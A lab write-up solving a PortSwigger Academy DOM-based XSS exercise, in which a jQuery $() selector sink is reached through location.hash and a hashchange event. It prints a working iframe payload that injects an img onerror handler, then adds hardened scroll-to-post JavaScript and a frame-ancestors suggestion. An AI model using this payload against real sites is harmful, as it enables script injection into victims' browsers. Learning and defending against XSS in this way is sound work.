BurpSuite Lab – DOM XSS in jQuery selector sink using a hashchange event

This lab contains a DOM-based cross-site scripting vulnerability on the home page. It uses jQuery’s $() selector function to auto-scroll to a given post, whose title is passed via the location.hash property.

To solve the lab, deliver an exploit to the victim that calls the print() function in their browser.

The affected code is:

Go to the exploit server:

Add the malicious iframe to the body:

<iframe src="https://0a2e00cb036dbde4c0785e5d005a000a.web-security-academy.net/#" onload="this.src+='<img src=1 onerror=print()>'"></iframe>

This payload is based on the PortSwigger Academy documentation on DOM-based XSS:
https://portswigger.net/web-security/cross-site-scripting/dom-based

Store it, deliver it to the victim and go back to the lab to solve it.
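
On the defensive side, the auto-scroll feature described at the top of this write-up can be implemented so that location.hash never reaches $(). The following is an added example, not the lab's code or the author's; the section.blog-list h2 selector, the function names and the sample titles are assumptions.

```javascript
// Added example: hardened "scroll to the post named in the hash" handler.
// Assumption: post titles are <h2> elements under section.blog-list.

// Decode the fragment. Malformed percent-encoding returns null instead of throwing.
function titleFromHash(hash) {
  const raw = String(hash || '').replace(/^#/, '');
  if (raw === '') return null;
  try {
    return decodeURIComponent(raw);
  } catch (e) {
    return null;
  }
}

// Match by comparing text, so the fragment is only ever treated as data:
// it is never concatenated into a selector string or parsed as HTML.
function findPostHeading(headings, hash) {
  const wanted = titleFromHash(hash);
  if (wanted === null) return null;
  for (const h of headings) {
    if (String(h.textContent).includes(wanted)) return h;
  }
  return null;
}

// Browser wiring (skipped when no DOM is present, e.g. under Node).
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  window.addEventListener('hashchange', () => {
    const headings = document.querySelectorAll('section.blog-list h2');
    const post = findPostHeading(headings, window.location.hash);
    if (post) post.scrollIntoView(); // only scroll when a post actually matched
  });
}

// Constructed sample data standing in for the page's headings.
const sampleHeadings = [
  { textContent: 'Spider Web Security' },
  { textContent: 'The Cool Parent' },
];
```

Because the iframe delivery depends on the page being framed by another origin, a Content-Security-Policy frame-ancestors directive on the response is a complementary control.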
